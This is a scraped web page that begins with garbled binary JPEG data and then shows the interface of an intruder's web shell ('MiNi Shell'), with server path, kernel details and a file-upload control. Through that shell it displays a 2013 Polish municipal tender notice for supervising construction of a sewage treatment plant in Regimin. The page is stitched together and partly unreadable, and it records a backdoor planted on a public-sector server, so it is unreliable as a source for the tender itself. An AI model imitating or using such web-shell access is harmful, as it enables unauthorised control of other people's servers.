JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130924/387616-N-2013.html

<p class="kh_header"><b>Regimin: Numer sprawy: 12/13. Nazwa zadania: 
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD REALIZACJĄ ZADANIA INWESTYCYJNEGO POD NAZWĄ: BUDOWA OCZYSZCZALNI ŚCIEKÓW DLA GMINY REGIMIN</b><br>
<b>Numer ogłoszenia: 387616 - 2013; data zamieszczenia: 24.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Regiminie , Regimin 22, 06-461 Regimin, woj. mazowieckie, tel. 023 6811756, faks 023 6811756.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Numer sprawy: 12/13. Nazwa zadania: 
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD REALIZACJĄ ZADANIA INWESTYCYJNEGO POD NAZWĄ: BUDOWA OCZYSZCZALNI ŚCIEKÓW DLA GMINY REGIMIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD REALIZACJĄ ZADANIA INWESTYCYJNEGO POD NAZWĄ: BUDOWA OCZYSZCZALNI ŚCIEKÓW DLA GMINY REGIMIN
Nadzór inwestorski sprawowany przez Wykonawcę, którego oferta zostanie wybrana dotyczyć będzie branży sanitarnej i wszelkich robót budowlanych związanych z budową oczyszczalni ścieków wraz z infrastrukturą techniczną.
W ramach nadzoru inwestorskiego Wykonawca zobowiązany zostanie w szczególności do:

-  reprezentowania Zamawiającego na budowie przez sprawowanie kontroli zgodności jej wykonania 
    z projektem, zgłoszeniem, przepisami i obowiązującymi Polskimi Normami oraz zasadami wiedzy 
    technicznej i zgodnością prowadzonych robót z zawartą umową. Inspektor nadzoru powinien 
    nadzorować budowę (roboty budowlane) w takich odstępach czasu, aby zapewniona była 
    skuteczność nadzoru oraz zależnie od potrzeb Wykonawcy i Zamawiającego.
-  sprawdzania jakości wykonanych robót, wbudowanych wyrobów, a w szczególności zapobieganie 
   zastosowaniu wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie,

-  w razie stwierdzenia niezgodności wykonywania robót budowlanych z dokumentacją projektową, 
   nieprawidłowości procesów technologicznych, użycia niewłaściwych materiałów, wad w 
   wykonywaniu lub prowadzeniu robót w sposób powodujący podwyższenie kosztów budowy bądź
   mogących narazić Zamawiającego na straty - Inspektor Nadzoru zwraca na to uwagę kierownikowi  
   budowy i w porozumieniu z Zamawiającym podejmuje odpowiednie decyzje, które wpisuje do 
   dziennika budowy wyznaczając termin ich wykonania i zawiadamia o nich na piśmie 
   Zamawiającego, wykonawcę robót budowlanych i autora projektu,

-  sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w  
   próbach i odbiorach technicznych instalacji i urządzeń technicznych oraz przygotowanie i udział 
   w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania,
   potwierdzania faktycznie wykonanych robót oraz usunięcie wad, 

-  wydawania kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do
   dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub   
   badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz 
   dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotów i stosowania  
   w budownictwie wyrobów oraz urządzeń technicznych,

-  żądania od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego 
    wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w 
    przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną 
    niezgodność z projektem lub zgłoszeniem robót budowlanych,

-  na każde żądanie Zamawiającego składanie sprawozdań z przebiegu realizacji inwestycji,

-  kontroli prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów 
    stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót,

-  w czasie każdorazowego pobytu na budowie Inspektor Nadzoru ma obowiązek dokonania 
    bieżącego przeglądu dziennika budowy oraz potwierdzenia dokonanych czynności stosownym 
    zapisem,

-   Inspektor Nadzoru bierze udział w komisjach technicznych powoływanych do oceny lub 
    rozstrzygnięcia technicznych spraw budowy w toku jej realizacji,

-   w porozumieniu z Zamawiającym każdorazowe zawiadamianie właściwego organu nadzoru 
    technicznego o wypadkach naruszania Prawa budowlanego, stwierdzonych w toku realizacji 
    budowy, dotyczących bezpieczeństwa budowy i ochrony środowiska, a także o rażących 
    nieprawidłowościach lub uchybieniach technicznych,

-  potwierdzenia wpisu kierownika budowy o zakończeniu robót w dzienniku budowy, 

- skompletowania wraz z Wykonawcą robót budowlanych dokumentów niezbędnych do 
   przeprowadzenia odbioru końcowego: protokołów odbioru, prób, badań, atestów, dokumentacji 
   powykonawczej, kart gwarancyjnych itp.,

-  w razie konieczności wykonania robót, zamówień uzupełniających lub zamiennych działając ściśle w 
   porozumieniu z Zamawiającym spisuje z kierownikiem budowy i przedstawicielem Zamawiającego i 
   nadzoru autorskiego protokół konieczności podając przybliżony koszt tych robót i występuje z 
   wnioskiem do Zamawiającego w sprawie ich wykonania oraz opracowania, w miarę potrzeby, dla 
   tych robót niezbędnej dokumentacji projektowo-kosztorysowej,

-  przygotowania do odbioru końcowego robót, sprawdzenia kompletności i prawidłowości 
   przedłożonych przez Wykonawcę robót dokumentów wymaganych do odbioru oraz uczestnictwo w 
   komisji odbiorowej powołanej przez Zamawiającego,

-  dojazd na miejsce budowy lub siedziby Zamawiającego,

-  czynności związane z ujawnieniem i kontrolą usunięcia przez Wykonawcę wad stwierdzonych w 
    okresie gwarancji i rękojmi, ustalonej w umowie zawartej przez Zamawiającego z Wykonawcą 
    robót budowlanych,

-  egzekwowania od Wykonawcy obowiązków wynikających ze Specyfikacji technicznej wykonania i 
    odbioru robót oraz postanowień umownych,

-  uczestnictwa w przekazaniu przez Zamawiającego Wykonawcy robót placu budowy oraz wszystkich 
    istniejących dokumentów, o których mowa w kontrakcie na wykonanie robót,

-  ścisłej współpracy z Projektantem w zakresie sprawowanego przez niego nadzoru autorskiego i 
    uzyskiwania od projektanta zgody na zmiany w zakresie projektu budowlanego oraz 
    powiadamiania Zamawiającego i Projektanta w każdym przypadku stwierdzenia jakichkolwiek 
    błędów, niejasności, sprzeczności lub wad w dokumentacji projektowej.

Zakres związany z pełnieniem funkcji nadzoru inwestorskiego został przedstawiony również we wzorze umowy (załącznik nr 1) wraz z formularzem ofertowym zamieszczonych na naszej stronie internetowej (www.regimin.pl).

Dla potrzeb sporządzenia oferty Wykonawca powinien przyjąć, że będzie potrzeba częstszych przyjazdów (szczególnie w fazie końcowych robót związanych z budową jak i rozruchem technologicznym oczyszczalni) w ciągu trwania zamówienia i częstotliwość przyjazdów może ulec zmianie (zwiększeniu) w związku z powyższym powinien ująć je w swojej ofercie zwiększając swoją cenę ofertową o ok. 15%  Koszty związane z dodatkowymi przyjazdami jak i nadzorem na budowie ponosi w tym wypadku Wykonawca.

Cena ofertowa w ciągu realizacji budowy oczyszczalni ścieków jak i jej zakończenia na usługę związanej z pełnieniem funkcji inspektora nadzoru inwestorskiego nie może ulec zmianie, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy na usługę będącą przedmiotem zamówienia. 

Wykonawca chcąc zapoznać się z zakresem robót budowlanych może wejść na naszą stronę internetową (www.regimin.pl) gdzie na głównej stronie wybierając zakładkę (najnowsze przetargi) znajduje się ogłoszenie z dnia 05.08.2013 dotyczące ogłoszenia o zamówieniu na budowę oczyszczalni ścieków dla gminy Regimin (wraz z niezbędną infrastrukturą techniczną) gdzie do każdej części ogłoszenia (część od 1 do 4) w załącznikach znajduje się cała dokumentacja techniczna).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.31.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
          Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków   
udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
          Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków   
udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
          Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków   
udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiodącym inspektorem nadzoru (koordynatorem) winna być osoba posiadająca uprawnienia budowlane w branży sanitarnej -  posiadający co najmniej 5 letnie doświadczenie zawodowe w prowadzeniu nadzoru inwestorskiego nad realizacją biologicznych oczyszczalni ścieków i posiadający uprawnienia  budowlane bez ograniczeń oraz zrzeszona we właściwym samorządzie zawodowym (PIIB);
   Wykonawca winien wykazać, że był inspektorem nadzoru inwestorskiego na co najmniej jednej robocie budowlanej polegającej na budowie oczyszczalni ścieków o technologii biologiczno - mechanicznej o przepustowości minimum 500 m3/dobę. 

Wykonawca powinien dysponować następującymi osobami posiadającymi doświadczenie i kwalifikacje do nadzorowania robotami branżowymi jak niżej:

	a) osoba posiadająca uprawnienia w branży konstrukcyjno-budowlanej - posiadająca co 
             najmniej 5 letnie doświadczenie zawodowe w wykonywaniu podobnych robót oraz 
             posiadająca aktualne uprawnienia  budowlane bez ograniczeń i zrzeszona jest we 
             właściwym samorządzie zawodowym; 

         b) osoba posiadająca uprawnienia w branży elektrycznej (w tym automatyka i sterowanie) 
            - posiadająca co najmniej 5 letnie doświadczenie zawodowe w wykonywaniu 
            podobnych robót oraz posiadająca aktualne uprawnienia budowlane bez ograniczeń i  
            zrzeszona jest we właściwym samorządzie zawodowym;

         c) osoba posiadająca uprawnienia w branży wodno - melioracyjnej - posiadająca co 
             najmniej 5 letnie doświadczenie zawodowe w wykonywaniu podobnych robót oraz 
             posiadająca aktualne uprawnienia  budowlane bez ograniczeń i zrzeszona jest we 
             właściwym samorządzie zawodowym; (chodzi o nadzór na roboty związane z 
             wykonaniem wylotu ścieków oraz umocnieniem skarp rzeki i rowów RŁ-22 i Ł-22/1).   

            Ocena spełniania warunku będzie dokonana zgodnie z formułą spełnia/nie spełnia, na      
            podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu 
            zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
          Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków   
udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w następujących przypadkach:
1) wystąpienia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania         
    poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego  
    rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin 
    realizacji zamówienia.
2) zaistnienia okoliczności po stronie zamawiającego, w szczególności spowodowanych sytuacją 
    finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które 
    nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji 
    umowy oraz terminy wynikające z harmonogramu
albo
3) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność  
    prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, 
    skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych 
    warunków zamówienia - zamawiający dopuszcza możliwość zmiany umowy, w szczególności    
    terminu realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.regimin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY REGIMIN
   REGIMIN 22
   06-461 REGIMIN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2013 godzina 10:00, miejsce: URZĄD GMINY REGIMIN
   REGIMIN 22
   06-461 REGIMIN
   Pokój nr 8 (Sekretariat Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com